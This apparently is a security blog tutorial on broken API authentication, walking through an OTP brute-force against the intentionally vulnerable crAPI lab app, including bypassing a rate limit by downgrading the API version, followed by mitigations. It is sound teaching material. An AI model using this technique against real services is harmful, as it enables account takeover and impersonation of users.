crAPI: Broken User Authentication
We had previously introduced you to crAPI. Using crAPI, we will now learn about several API vulnerabilities. API2:2019 Broken User Authentication is our first issue.
Broken authentication is a term that covers several vulnerabilities in APIs that attackers might use to impersonate legitimate users. These weaknesses usually arise when an API company fails to implement or incorrectly implements an authentication mechanism. We can classify inherent problems into two categories: bad session management and poor token management. An attack aims to take over users’ accounts and get the same access as the attacked user.
Situations when an API is vulnerable:
- Credential stuffing, injection of stolen usernames and passwords
- Use of weak encryption keys
- Brute-forcing login credentials
- Sensitive information in a GET request
- Not validating tokens
- Allowing weak passwords
Navigate to the application’s “forgot password” page.
- Input the victim’s email address and click “Send OTP.”
3. Now try changing the password with an invalid OTP.
4. Capture the change password request using the ZAP Proxy tool. Now, we will fuzz the OTP.
5. Mark the OTP value and use the range from 0000-9999 as the payload.
6. However, we failed to bypass the OTP page as the application has a rate-limit set. Observe the 503 status code and response body.
7. We downgraded the API version from v3 to v2 and repeated the request to get around the protection. It is worth noting that the server accepts the request, thereby bypassing the rate-limit.
8. We attempted fuzzing the OTP verification endpoint with the same options and were able to successfully validate our OTP.
Here, an attacker who knows the user’s email address can exploit this vulnerability to take control of the user’s account. They can then impersonate the victim and steal their personal information stored on the site.
- Do not recreate the flow of authentication, token creation, and password storage. Make use of the standards.
- Implement multi-factor authentication.
- Implement an account lockout policy or a captcha mechanism after three failed attempts to prevent brute-force attacks.
- Implement a strong and complex password or passphrase mechanism.
- Use the same error messages for all responses to secure against user account enumeration attacks.
- Use the OWASP Authentication Cheatsheet.
In our next blog post, we will learn about various Broken function level authorization issues in crAPI.